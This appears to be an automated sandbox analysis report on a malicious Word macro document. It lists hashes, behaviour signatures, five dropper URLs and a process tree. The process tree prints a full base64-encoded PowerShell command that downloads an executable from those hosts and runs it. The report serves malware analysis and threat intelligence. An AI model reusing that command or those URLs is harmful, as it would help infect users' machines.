Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/09/2024, 12:31

General

  • Target

    ed97c23ae28330668ac7857640f8e9d1_JaffaCakes118.doc

  • Size

    202KB

  • MD5

    ed97c23ae28330668ac7857640f8e9d1

  • SHA1

    c80fa96e145290028cb144657c0f2e357e524df3

  • SHA256

    608ee8e057af25aa01d6449635cdb3e8fe78f8ca85e7482476171fbba8346514

  • SHA512

    11b113bb1090d6b3974a66300de9dd5e12a9b2a5a1abed974e4971d6ad6a479d03416ac7b7a054bd0f8f0bc5c5cba2daa7d4894f8dc053b3ecfaedcb71271a9e

  • SSDEEP

    3072:Z2y/Gdy5ktGDWLS0HZWD5w8K7Nk9yD7IBUgNf6EOpwm53Rt:Z2k4NtGiL3HJk9yD7bkf6Eqwm53Rt

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://femminent.com/wp/UqU/

exe.dropper

http://liberty.blvrdev.com/stats/bLH/

exe.dropper

http://milkteaway.azurewebsites.net/calendar/bNmo99828/

exe.dropper

http://nehashetty.xyz/wp-admin/vNWZ/

exe.dropper

http://storeofofficial.shop/pokjbg746ihrtr/3u/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed97c23ae28330668ac7857640f8e9d1_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2788
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABEAHYAYwB3AG8AYQBmAGgAYQB4AGUAPQAnAEIAZwBhAG4AawBjAHkAbwBkAHkAegBpAHAAJwA7ACQAUQBvAG0AegBhAHoAbwB1AGEAIAA9ACAAJwAzADMANwAnADsAJABFAGoAbQBhAGIAbABoAHAAaQB2AGcAPQAnAFIAawBtAGMAcQB5AHQAegBiAGoAeAAnADsAJABYAHAAcABkAHIAZQBrAGgAbAB5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABRAG8AbQB6AGEAegBvAHUAYQArACcALgBlAHgAZQAnADsAJABBAHcAYwBuAHkAcwBxAHIAdgBvAHMAbAB1AD0AJwBMAGYAbwB2AHMAeABsAG8AbgBnAHoAagB2ACcAOwAkAEsAaABiAHkAYwBzAHQAcQBqAHUAdwA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAQgBjAEwAaQBlAE4AdAA7ACQAUgBqAGwAcQBrAHIAcgB2AD0AJwBoAHQAdABwADoALwAvAGYAZQBtAG0AaQBuAGUAbgB0AC4AYwBvAG0ALwB3AHAALwBVAHEAVQAvACoAaAB0AHQAcAA6AC8ALwBsAGkAYgBlAHIAdAB5AC4AYgBsAHYAcgBkAGUAdgAuAGMAbwBtAC8AcwB0AGEAdABzAC8AYgBMAEgALwAqAGgAdAB0AHAAOgAvAC8AbQBpAGwAawB0AGUAYQB3AGEAeQAuAGEAegB1AHIAZQB3AGUAYgBzAGkAdABlAHMALgBuAGUAdAAvAGMAYQBsAGUAbgBkAGEAcgAvAGIATgBtAG8AOQA5ADgAMgA4AC8AKgBoAHQAdABwADoALwAvAG4AZQBoAGEAcwBoAGUAdAB0AHkALgB4AHkAegAvAHcAcAAtAGEAZABtAGkAbgAvAHYATgBXAFoALwAqAGgAdAB0AHAAOgAvAC8AcwB0AG8AcgBlAG8AZgBvAGYAZgBpAGMAaQBhAGwALgBzAGgAbwBwAC8AcABvAGsAagBiAGcANwA0ADYAaQBoAHIAdAByAC8AMwB1AC8AJwAuACIAcwBgAFAATABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABaAG8AYwBjAGwAbABtAHUAPQAnAFEAeQB3AHcAdQByAHcAagB1AG8AdgAnADsAZgBvAHIAZQBhAGMAaAAoACQATgB1AGgAcQB4AGIAaQBwAHAAdAAgAGkAbgAgACQAUgBqAGwAcQBrAHIAcgB2ACkAewB0AHIAeQB7ACQASwBoAGIAeQBjAHMAdABxAGoAdQB3AC4AIgBkAE8AdwBgAE4AbABPAGEAYABEAEYAaQBMAGUAIgAoACQATgB1AGgAcQB4AGIAaQBwAHAAdAAsACAAJABYAHAAcABkAHIAZQBrAGgAbAB5ACkAOwAkAEYAYgBvAGkAbwBoAHoAaQA9ACcAUgBvAGQAagBzAGQAbgB5ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAWABwAHAAZAByAGUAawBoAGwAeQApAC4AIgBMAGAARQBuAGcAdABIACIAIAAtAGcAZQAgADIAOAAxADIAMAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIAZQBhAFQARQAiACgAJABYAHAAcABkAHIAZQBrAGgAbAB5ACkAOwAkAEMAegBwAHIAdABvAGQAYQBhAD0AJwBGAG0AdwBhAHgAYwB5AG4AeAAnADsAYgByAGUAYQBrADsAJABXAGUAaABxAGkAZABmAGgAcABsAGQAdgA9ACcAWQBxAHYAcwB3AGgAdABhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAbQByAGcAawBhAHcAdABhAGcAPQAnAEoAYwBnAHoAdQB0AGwAdwBjAHIAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2408

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      5d98d90f3ca6b3609c38d173691754e4

      SHA1

      11f0b2c6ef237fd695df42000b7a65192fdd5a08

      SHA256

      5ef9bff72120efa61d49e29de857dd9792a7df37d53804adac2d50beb3d50c5e

      SHA512

      d04ed926c799e305753b0bb8c209be1d43a0b9287ed2055a5bb21ad26709ab5574e43594962d1465a531d46cc379fe0bcf5a1bf436314fbbbf2fc4e47f447650

    • memory/2280-22-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-43-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-5-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-7-0x0000000006750000-0x0000000006850000-memory.dmp

      Filesize

      1024KB

    • memory/2280-23-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-12-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-11-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-10-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-9-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-8-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-17-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-13-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-2-0x000000007119D000-0x00000000711A8000-memory.dmp

      Filesize

      44KB

    • memory/2280-18-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-6-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-27-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-28-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-33-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-32-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-61-0x000000007119D000-0x00000000711A8000-memory.dmp

      Filesize

      44KB

    • memory/2280-60-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2280-41-0x000000007119D000-0x00000000711A8000-memory.dmp

      Filesize

      44KB

    • memory/2280-42-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-0-0x000000002F0E1000-0x000000002F0E2000-memory.dmp

      Filesize

      4KB

    • memory/2280-44-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2280-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2408-40-0x0000000002690000-0x0000000002698000-memory.dmp

      Filesize

      32KB

    • memory/2408-39-0x000000001B780000-0x000000001BA62000-memory.dmp

      Filesize

      2.9MB